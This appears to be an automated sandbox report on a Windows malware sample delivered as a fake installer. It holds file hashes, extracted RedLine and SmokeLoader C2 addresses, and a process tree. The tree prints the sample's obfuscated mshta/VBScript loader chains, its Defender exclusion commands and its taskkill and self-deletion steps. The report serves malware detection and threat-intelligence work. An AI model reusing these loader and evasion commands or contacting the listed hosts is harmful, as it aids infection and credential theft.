Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
11-10-2021 20:45
211011-zjxjlsabbm 1011-10-2021 13:10
211011-qegsxshcfp 1011-10-2021 10:55
211011-mz7y3ahaak 1010-10-2021 19:24
211010-x4mtssgae2 10Analysis
-
max time kernel
1804s -
max time network
1809s -
platform
windows7_x64 -
resource
win7-de-20210920 -
submitted
10-10-2021 19:24
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
3.9MB
-
MD5
a4d23ac3c7172b9aa02e35b6bf0fd21f
-
SHA1
0326aab7deddfefc048c9a67ac9ce4ee14ea9003
-
SHA256
9bd142ecfe89857de80bb3255a1655f680ca6451b45cca235096dc1c1285e806
-
SHA512
9e425d8a1beaeabfc983bb75a7a5f8a8c0823e825e9f66e17b0f515b2897da9f2d9b2f1aa9939fdbae6c826c2c730d3bc772abec9e35a61d3d73a6cdb87ddf10
Malware Config
Extracted
redline
she
135.181.129.119:4805
Extracted
smokeloader
2020
http://gmpeople.com/upload/
http://mile48.com/upload/
http://lecanardstsornin.com/upload/
http://m3600.com/upload/
http://camasirx.com/upload/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3336 1664 rUNdlL32.eXe 90 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
resource yara_rule behavioral3/memory/1980-200-0x0000000001880000-0x000000000189F000-memory.dmp family_redline behavioral3/memory/1980-209-0x0000000003400000-0x000000000341D000-memory.dmp family_redline behavioral3/memory/2572-258-0x000000000041B23A-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 3 IoCs
resource yara_rule behavioral3/files/0x0005000000013271-103.dat family_socelars behavioral3/files/0x0005000000013271-152.dat family_socelars behavioral3/files/0x0005000000013271-127.dat family_socelars -
resource yara_rule behavioral3/files/0x0005000000013066-70.dat aspack_v212_v242 behavioral3/files/0x0005000000013066-71.dat aspack_v212_v242 behavioral3/files/0x000600000001267c-72.dat aspack_v212_v242 behavioral3/files/0x000600000001267c-73.dat aspack_v212_v242 behavioral3/files/0x00050000000130d5-76.dat aspack_v212_v242 behavioral3/files/0x00050000000130d5-77.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 8 IoCs
pid Process 1380 setup_installer.exe 1832 setup_install.exe 1140 Sun1577c3e159a3e3815.exe 1856 Sun15dbd675f871ca.exe 2028 Sun152bab5a2de.exe 972 Sun15f67075f27a2b5b.exe 916 Sun15901f2f025e.exe 568 Sun159ff1acacf.exe -
Loads dropped DLL 32 IoCs
pid Process 1796 setup_x86_x64_install.exe 1380 setup_installer.exe 1380 setup_installer.exe 1380 setup_installer.exe 1380 setup_installer.exe 1380 setup_installer.exe 1380 setup_installer.exe 1832 setup_install.exe 1832 setup_install.exe 1832 setup_install.exe 1832 setup_install.exe 1832 setup_install.exe 1832 setup_install.exe 1832 setup_install.exe 1832 setup_install.exe 1872 cmd.exe 976 cmd.exe 976 cmd.exe 1012 cmd.exe 1044 cmd.exe 1676 cmd.exe 1856 Sun15dbd675f871ca.exe 1856 Sun15dbd675f871ca.exe 1140 Sun1577c3e159a3e3815.exe 1140 Sun1577c3e159a3e3815.exe 2028 Sun152bab5a2de.exe 2028 Sun152bab5a2de.exe 1992 cmd.exe 1992 cmd.exe 1664 Process not Found 1664 Process not Found 292 cmd.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 20 ip-api.com 44 ipinfo.io 45 ipinfo.io -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
pid pid_target Process procid_target 2592 1856 WerFault.exe 38 3372 2992 WerFault.exe 111 -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3672 schtasks.exe 1076 schtasks.exe -
Kills process with taskkill 4 IoCs
pid Process 2256 taskkill.exe 2956 taskkill.exe 2332 taskkill.exe 2836 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1796 wrote to memory of 1380 1796 setup_x86_x64_install.exe 28 PID 1796 wrote to memory of 1380 1796 setup_x86_x64_install.exe 28 PID 1796 wrote to memory of 1380 1796 setup_x86_x64_install.exe 28 PID 1796 wrote to memory of 1380 1796 setup_x86_x64_install.exe 28 PID 1796 wrote to memory of 1380 1796 setup_x86_x64_install.exe 28 PID 1796 wrote to memory of 1380 1796 setup_x86_x64_install.exe 28 PID 1796 wrote to memory of 1380 1796 setup_x86_x64_install.exe 28 PID 1380 wrote to memory of 1832 1380 setup_installer.exe 29 PID 1380 wrote to memory of 1832 1380 setup_installer.exe 29 PID 1380 wrote to memory of 1832 1380 setup_installer.exe 29 PID 1380 wrote to memory of 1832 1380 setup_installer.exe 29 PID 1380 wrote to memory of 1832 1380 setup_installer.exe 29 PID 1380 wrote to memory of 1832 1380 setup_installer.exe 29 PID 1380 wrote to memory of 1832 1380 setup_installer.exe 29 PID 1832 wrote to memory of 1740 1832 setup_install.exe 31 PID 1832 wrote to memory of 1740 1832 setup_install.exe 31 PID 1832 wrote to memory of 1740 1832 setup_install.exe 31 PID 1832 wrote to memory of 1740 1832 setup_install.exe 31 PID 1832 wrote to memory of 1740 1832 setup_install.exe 31 PID 1832 wrote to memory of 1740 1832 setup_install.exe 31 PID 1832 wrote to memory of 1740 1832 setup_install.exe 31 PID 1832 wrote to memory of 1012 1832 setup_install.exe 32 PID 1832 wrote to memory of 1012 1832 setup_install.exe 32 PID 1832 wrote to memory of 1012 1832 setup_install.exe 32 PID 1832 wrote to memory of 1012 1832 setup_install.exe 32 PID 1832 wrote to memory of 1012 1832 setup_install.exe 32 PID 1832 wrote to memory of 1012 1832 setup_install.exe 32 PID 1832 wrote to memory of 1012 1832 setup_install.exe 32 PID 1832 wrote to memory of 1676 1832 setup_install.exe 33 PID 1832 wrote to memory of 1676 1832 setup_install.exe 33 PID 1832 wrote to memory of 1676 1832 setup_install.exe 33 PID 1832 wrote to memory of 1676 1832 setup_install.exe 33 PID 1832 wrote to memory of 1676 1832 setup_install.exe 33 PID 1832 wrote to memory of 1676 1832 setup_install.exe 33 PID 1832 wrote to memory of 1676 1832 setup_install.exe 33 PID 1832 wrote to memory of 1044 1832 setup_install.exe 34 PID 1832 wrote to memory of 1044 1832 setup_install.exe 34 PID 1832 wrote to memory of 1044 1832 setup_install.exe 34 PID 1832 wrote to memory of 1044 1832 setup_install.exe 34 PID 1832 wrote to memory of 1044 1832 setup_install.exe 34 PID 1832 wrote to memory of 1044 1832 setup_install.exe 34 PID 1832 wrote to memory of 1044 1832 setup_install.exe 34 PID 1832 wrote to memory of 1872 1832 setup_install.exe 35 PID 1832 wrote to memory of 1872 1832 setup_install.exe 35 PID 1832 wrote to memory of 1872 1832 setup_install.exe 35 PID 1832 wrote to memory of 1872 1832 setup_install.exe 35 PID 1832 wrote to memory of 1872 1832 setup_install.exe 35 PID 1832 wrote to memory of 1872 1832 setup_install.exe 35 PID 1832 wrote to memory of 1872 1832 setup_install.exe 35 PID 1832 wrote to memory of 976 1832 setup_install.exe 36 PID 1832 wrote to memory of 976 1832 setup_install.exe 36 PID 1832 wrote to memory of 976 1832 setup_install.exe 36 PID 1832 wrote to memory of 976 1832 setup_install.exe 36 PID 1832 wrote to memory of 976 1832 setup_install.exe 36 PID 1832 wrote to memory of 976 1832 setup_install.exe 36 PID 1832 wrote to memory of 976 1832 setup_install.exe 36 PID 1832 wrote to memory of 292 1832 setup_install.exe 37 PID 1832 wrote to memory of 292 1832 setup_install.exe 37 PID 1832 wrote to memory of 292 1832 setup_install.exe 37 PID 1832 wrote to memory of 292 1832 setup_install.exe 37 PID 1832 wrote to memory of 292 1832 setup_install.exe 37 PID 1832 wrote to memory of 292 1832 setup_install.exe 37 PID 1832 wrote to memory of 292 1832 setup_install.exe 37 PID 1832 wrote to memory of 1992 1832 setup_install.exe 53
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1796 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1380 -
C:\Users\Admin\AppData\Local\Temp\7zS465B9016\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS465B9016\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1832 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:1740
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:1804
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun152bab5a2de.exe4⤵
- Loads dropped DLL
PID:1012 -
C:\Users\Admin\AppData\Local\Temp\7zS465B9016\Sun152bab5a2de.exeSun152bab5a2de.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2028
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15901f2f025e.exe4⤵
- Loads dropped DLL
PID:1676 -
C:\Users\Admin\AppData\Local\Temp\7zS465B9016\Sun15901f2f025e.exeSun15901f2f025e.exe5⤵
- Executes dropped EXE
PID:916 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:2200
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:2332
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15dbd675f871ca.exe4⤵
- Loads dropped DLL
PID:1044 -
C:\Users\Admin\AppData\Local\Temp\7zS465B9016\Sun15dbd675f871ca.exeSun15dbd675f871ca.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1856 -
C:\Users\Admin\Pictures\Adobe Films\JA0sBIg9FieAAbFdQ0Axeu0W.exe"C:\Users\Admin\Pictures\Adobe Films\JA0sBIg9FieAAbFdQ0Axeu0W.exe"6⤵PID:2660
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1856 -s 6886⤵
- Program crash
PID:2592
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15f67075f27a2b5b.exe4⤵
- Loads dropped DLL
PID:1872 -
C:\Users\Admin\AppData\Local\Temp\7zS465B9016\Sun15f67075f27a2b5b.exeSun15f67075f27a2b5b.exe5⤵
- Executes dropped EXE
PID:972 -
C:\Users\Admin\AppData\Roaming\6541883.scr"C:\Users\Admin\AppData\Roaming\6541883.scr" /S6⤵PID:2208
-
-
C:\Users\Admin\AppData\Roaming\5153673.scr"C:\Users\Admin\AppData\Roaming\5153673.scr" /S6⤵PID:2400
-
-
C:\Users\Admin\AppData\Roaming\7442966.scr"C:\Users\Admin\AppData\Roaming\7442966.scr" /S6⤵PID:2736
-
-
C:\Users\Admin\AppData\Roaming\3689974.scr"C:\Users\Admin\AppData\Roaming\3689974.scr" /S6⤵PID:2848
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1577c3e159a3e3815.exe /mixone4⤵
- Loads dropped DLL
PID:976 -
C:\Users\Admin\AppData\Local\Temp\7zS465B9016\Sun1577c3e159a3e3815.exeSun1577c3e159a3e3815.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1140 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Sun1577c3e159a3e3815.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS465B9016\Sun1577c3e159a3e3815.exe" & exit6⤵PID:2812
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Sun1577c3e159a3e3815.exe" /f7⤵
- Kills process with taskkill
PID:2956
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15f1b1f8c669.exe4⤵
- Loads dropped DLL
PID:292 -
C:\Users\Admin\AppData\Local\Temp\7zS465B9016\Sun15f1b1f8c669.exeSun15f1b1f8c669.exe5⤵PID:1980
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun152bea652bd7232.exe4⤵PID:1188
-
C:\Users\Admin\AppData\Local\Temp\7zS465B9016\Sun152bea652bd7232.exeSun152bea652bd7232.exe5⤵PID:1156
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1507db358fce61c0b.exe4⤵PID:1664
-
C:\Users\Admin\AppData\Local\Temp\7zS465B9016\Sun1507db358fce61c0b.exeSun1507db358fce61c0b.exe5⤵PID:628
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun158d8ef840.exe4⤵PID:520
-
C:\Users\Admin\AppData\Local\Temp\7zS465B9016\Sun158d8ef840.exeSun158d8ef840.exe5⤵PID:780
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS465B9016\Sun158d8ef840.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS465B9016\Sun158d8ef840.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )6⤵PID:1880
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS465B9016\Sun158d8ef840.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS465B9016\Sun158d8ef840.exe") do taskkill /F -Im "%~NxU"7⤵PID:2164
-
C:\Users\Admin\AppData\Local\Temp\09xU.exE09xU.EXE -pPtzyIkqLZoCarb5ew8⤵PID:2228
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )9⤵PID:2300
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"10⤵PID:2424
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )9⤵PID:2680
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I10⤵PID:2364
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "11⤵PID:1504
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"11⤵PID:2732
-
-
C:\Windows\SysWOW64\control.execontrol .\R6f7sE.I11⤵PID:340
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -Im "Sun158d8ef840.exe"8⤵
- Kills process with taskkill
PID:2256
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun152e52d07b74d9b5.exe4⤵PID:1644
-
C:\Users\Admin\AppData\Local\Temp\7zS465B9016\Sun152e52d07b74d9b5.exeSun152e52d07b74d9b5.exe5⤵PID:804
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵PID:2220
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵PID:2468
-
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"7⤵PID:2552
-
C:\Users\Admin\AppData\Roaming\4772026.scr"C:\Users\Admin\AppData\Roaming\4772026.scr" /S8⤵PID:2884
-
-
C:\Users\Admin\AppData\Roaming\1569822.scr"C:\Users\Admin\AppData\Roaming\1569822.scr" /S8⤵PID:2428
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"9⤵PID:3192
-
-
-
C:\Users\Admin\AppData\Roaming\8547491.scr"C:\Users\Admin\AppData\Roaming\8547491.scr" /S8⤵PID:2992
-
C:\Users\Admin\AppData\Local\Temp\519e2192-808b-4e91-b085-48e42bfb8fa5\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\519e2192-808b-4e91-b085-48e42bfb8fa5\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\519e2192-808b-4e91-b085-48e42bfb8fa5\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run9⤵PID:3764
-
C:\Users\Admin\AppData\Local\Temp\519e2192-808b-4e91-b085-48e42bfb8fa5\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\519e2192-808b-4e91-b085-48e42bfb8fa5\AdvancedRun.exe" /SpecialRun 4101d8 376410⤵PID:3804
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\8547491.scr" -Force9⤵PID:844
-
-
C:\Users\Admin\AppData\Roaming\8547491.scr"C:\Users\Admin\AppData\Roaming\8547491.scr"9⤵PID:2176
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\8547491.scr" -Force9⤵PID:3300
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2992 -s 14889⤵
- Program crash
PID:3372
-
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr" /S8⤵PID:2320
-
C:\Users\Admin\AppData\Local\Temp\24e46358-f110-41f5-8d63-17853f6c0025\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\24e46358-f110-41f5-8d63-17853f6c0025\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\24e46358-f110-41f5-8d63-17853f6c0025\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run9⤵PID:3812
-
C:\Users\Admin\AppData\Local\Temp\24e46358-f110-41f5-8d63-17853f6c0025\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\24e46358-f110-41f5-8d63-17853f6c0025\AdvancedRun.exe" /SpecialRun 4101d8 381210⤵PID:3852
-
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3356
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3344
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3380
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2836
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3136
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:1432
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2312
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\7970286.scr" -Force9⤵PID:3304
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2256
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\7970286.scr" -Force9⤵PID:3248
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3512
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3640
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2112
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3580
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3664
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:832
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2172
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:1740
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2340
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2108
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2124
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3712
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:900
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3628
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:916
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:1072
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2956
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2880
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3784
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3156
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3796
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3932
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3804
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3940
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3992
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3948
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3956
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3672
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3624
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3888
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3560
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3728
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3876
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3456
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3988
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3600
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3008
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3020
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2980
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:1100
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2988
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:1748
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2096
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3564
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3060
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3840
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2684
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3264
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:1220
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3116
-
-
